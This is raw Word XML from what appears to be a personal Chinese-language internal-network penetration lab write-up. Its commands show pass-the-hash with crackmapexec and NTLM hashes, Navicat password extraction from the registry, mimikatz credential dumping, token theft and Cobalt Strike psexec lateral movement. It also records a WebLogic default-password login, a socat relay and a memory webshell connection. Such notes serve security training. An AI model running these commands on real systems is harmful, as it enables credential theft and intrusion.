    <w:p w14:paraId="5B25390D" w14:textId="40C225C7" w:rsidR="00D81EDE" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502885DE" w14:textId="0D829CA6" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51388E4A" wp14:editId="4AFE31AC">
            <wp:extent cx="5274310" cy="46355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3A80" w14:textId="09418790" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓取win</w:t>
      </w:r>
      <w:r>
        <w:t>2012 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA5291" w14:textId="66C04E04" w:rsidR="00D81EDE" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291388AB" wp14:editId="410BE4F6">
            <wp:extent cx="5274310" cy="49593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D4C1" w14:textId="505E51DE" w:rsidR="00D81EDE" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:t xml:space="preserve">proxychains4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D81EDE">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D81EDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D81EDE">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D81EDE">
        <w:t xml:space="preserve"> 192.168.137.142 -u Administrator xiaodi857 Guest -H 53bd9892cea6f1d9ffa8ac587ba3cba6 b460df8d4e10e2b83231c2f48f6757e2 31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D64A5C" w14:textId="3BB72F8B" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA7C23B" wp14:editId="46E9AC45">
            <wp:extent cx="5274310" cy="179451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50C9" w14:textId="685F7034" w:rsidR="00F54B89" w:rsidRDefault="00F54B89" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看w</w:t>
      </w:r>
      <w:r>
        <w:t>in7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11103592" w14:textId="11FCD6A2" w:rsidR="00F57AB1" w:rsidRPr="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>PremiumSoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>Navicat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t xml:space="preserve"> 的开发商）和 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>Colasoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t>Navicat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F54B89">
        <w:t xml:space="preserve"> 会保存数据库连接密码，可以从注册表里提取，这些密码很可能就是连接其他机器数据库用的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C7296" w14:textId="43EC0872" w:rsidR="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看注册表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CCFD6" w14:textId="1D4EB3F4" w:rsidR="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\SOFTWARE\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>PremiumSoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>Navicat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="484C7A"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        </w:rPr>
        <w:t>\Servers\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A630E" w14:textId="55EB3C8A" w:rsidR="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00F57AB1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027C53BA" wp14:editId="2138EC62">
            <wp:extent cx="5274310" cy="154305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6342" w14:textId="72B2329F" w:rsidR="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后续如下，但是软件许可证过期了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D22F2" w14:textId="69E48830" w:rsidR="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00814DE1">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/geek233/p/16772618.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66B8D4A3" w14:textId="77777777" w:rsidR="00F57AB1" w:rsidRPr="00F57AB1" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165C18C6" w14:textId="3289BE76" w:rsidR="00FF6FD0" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入进程使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>imikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行明文抓取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C9466" w14:textId="23CEA9AE" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63D18909" w14:textId="6B9E49FF" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>steal</w:t>
      </w:r>
      <w:r>
        <w:t>_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39BE2A24" w14:textId="70410FD1" w:rsidR="00FF6FD0" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00DB0444">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B08CA27" wp14:editId="39244382">
            <wp:extent cx="5274310" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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D6C1" w14:textId="6A89E0ED" w:rsidR="00FF6FD0" w:rsidRDefault="00F57AB1" w:rsidP="00FF6FD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xiaodi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4686CA26" w14:textId="14A10969" w:rsidR="00F70A84" w:rsidRDefault="00F70A84" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00F70A84">
        <w:t xml:space="preserve">proxychains4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t xml:space="preserve"> 192.168.137.142 -u Administrator -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t>xiaodi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t xml:space="preserve"> -x "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70A84">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE22B3" w14:textId="26EAAF0B" w:rsidR="00FF6FD0" w:rsidRDefault="00F70A84" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00F70A84">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1449F145" wp14:editId="3AABC3F8">
            <wp:extent cx="5274310" cy="98044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2E7B" w14:textId="5893BCEB" w:rsidR="00FF6FD0" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上线win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C36C1F" w14:textId="3FAF422A" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建监听器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4ABD6" w14:textId="58DC7B51" w:rsidR="00FF6FD0" w:rsidRDefault="00DB0444" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00DB0444">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20967AAA" wp14:editId="47EC8CA5">
            <wp:extent cx="5107464" cy="2096347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07464" cy="209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E09F" w14:textId="77777777" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00DB0444">
      <w:pPr>
        <w:pStyle w:val="a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"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">jump </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.137.142 http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>（跟监听器名字相同）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC10175" w14:textId="0259D622" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00DB0444">
      <w:pPr>
        <w:pStyle w:val="a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noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C164CA5" wp14:editId="417D635E">
            <wp:extent cx="5274310" cy="417195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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1F392" w14:textId="77777777" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00DB0444">
      <w:pPr>
        <w:pStyle w:val="a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AC9EA81" w14:textId="4D53CD63" w:rsidR="00DB0444" w:rsidRDefault="00DB0444" w:rsidP="00DB0444">
      <w:pPr>
        <w:pStyle w:val="a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noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8752FE" wp14:editId="669DC322">
            <wp:extent cx="3865880" cy="810260"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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880" cy="81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3C96A" w14:textId="25CCE6C0" w:rsidR="00DB0444" w:rsidRDefault="00C71BA8" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00C71BA8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D828A8" wp14:editId="7D47DB1D">
            <wp:extent cx="5274310" cy="2061210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1F81" w14:textId="700C0533" w:rsidR="00B55755" w:rsidRDefault="00B55755" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新网段1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.10.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在新主机1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.52.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D6EDA" w14:textId="13018D92" w:rsidR="00745870" w:rsidRDefault="00B55755" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00B55755">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C4312C" wp14:editId="7B9F354E">
            <wp:extent cx="5012176" cy="829010"/>
            <wp:effectExtent l="0" t="0" r="0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12176" cy="82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E4F8" w14:textId="3272E737" w:rsidR="00E047F4" w:rsidRDefault="00E047F4" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描：5</w:t>
      </w:r>
      <w:r>
        <w:t>985</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5985/5986</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是现代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>首选的远程管理方式，配合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>极其强大</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A9D8D" w14:textId="340B283B" w:rsidR="00E047F4" w:rsidRDefault="00E047F4" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00E047F4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C7DD71" wp14:editId="69870094">
            <wp:extent cx="3601906" cy="457385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1906" cy="45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1D1A" w14:textId="4B44B7F1" w:rsidR="00E047F4" w:rsidRDefault="003D06B6" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="003D06B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5287A2FA" wp14:editId="165D651B">
            <wp:extent cx="5274310" cy="1094105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6E0C" w14:textId="5816F4BB" w:rsidR="003D06B6" w:rsidRDefault="003D06B6" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="003D06B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FEF134D" wp14:editId="409C9542">
            <wp:extent cx="5274310" cy="1318260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9250" w14:textId="77777777" w:rsidR="003D06B6" w:rsidRDefault="003D06B6">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EABB0E" w14:textId="795B62A8" w:rsidR="003D06B6" w:rsidRDefault="003D06B6" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>均失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DF12C" w14:textId="746C3D9E" w:rsidR="003D06B6" w:rsidRDefault="003D06B6" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更多端口扫描</w:t>
      </w:r>
      <w:r w:rsidR="001078C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：7</w:t>
      </w:r>
      <w:r w:rsidR="001078C2">
        <w:t>001</w:t>
      </w:r>
      <w:r w:rsidR="001078C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268E532" w14:textId="2855A799" w:rsidR="003D06B6" w:rsidRDefault="003D06B6" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="003D06B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61593F4F" wp14:editId="79A7758D">
            <wp:extent cx="5274310" cy="924560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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5858" w14:textId="7F892959" w:rsidR="003D06B6" w:rsidRDefault="001078C2" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="001078C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48464329" wp14:editId="02512F1D">
            <wp:extent cx="5274310" cy="1392555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35EB" w14:textId="50CA40A2" w:rsidR="001078C2" w:rsidRDefault="001078C2" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="001078C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB67025" wp14:editId="3559CAEA">
            <wp:extent cx="5274310" cy="2113915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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6795" w14:textId="321BA04D" w:rsidR="001078C2" w:rsidRDefault="001078C2" w:rsidP="00FF6FD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:t>logic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/weblogic123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱密码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1830F" w14:textId="277EB18E" w:rsidR="001078C2" w:rsidRDefault="000D0ACB" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="000D0ACB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4359DA83" wp14:editId="6920B9A4">
            <wp:extent cx="2534675" cy="209635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34675" cy="20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5A6B" w14:textId="61162A3C" w:rsidR="000D0ACB" w:rsidRDefault="000D0ACB" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="000D0ACB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07EA37E8" wp14:editId="2B290E4B">
            <wp:extent cx="5274310" cy="2085340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3B94" w14:textId="2239EEFE" w:rsidR="000D0ACB" w:rsidRDefault="000D0ACB" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="000D0ACB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404AE566" wp14:editId="27AC90C0">
            <wp:extent cx="5274310" cy="1006475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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4690" w14:textId="5A5A5819" w:rsidR="000D0ACB" w:rsidRDefault="000D0ACB" w:rsidP="00FF6FD0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t xml:space="preserve"> TCP-LISTEN:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t>1081,fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D0ACB">
        <w:t>,reuseaddr,bind=0.0.0.0 TCP:127.0.0.1:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F28CB9" w14:textId="146A4105" w:rsidR="00110A12" w:rsidRDefault="00110A12" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows配置代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B29A4C" w14:textId="4B4D1144" w:rsidR="000D0ACB" w:rsidRDefault="00110A12" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00110A12">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D0792B5" wp14:editId="7DAFBFB4">
            <wp:extent cx="5274310" cy="1102360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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C3D3C" w14:textId="66843576" w:rsidR="00110A12" w:rsidRDefault="00110A12" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00110A12">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43771F0E" wp14:editId="6C8F1698">
            <wp:extent cx="5274310" cy="1052830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EA26" w14:textId="330599C7" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存马</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E93FB5" w14:textId="39FF6D02" w:rsidR="002C4793" w:rsidRDefault="002C4793" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
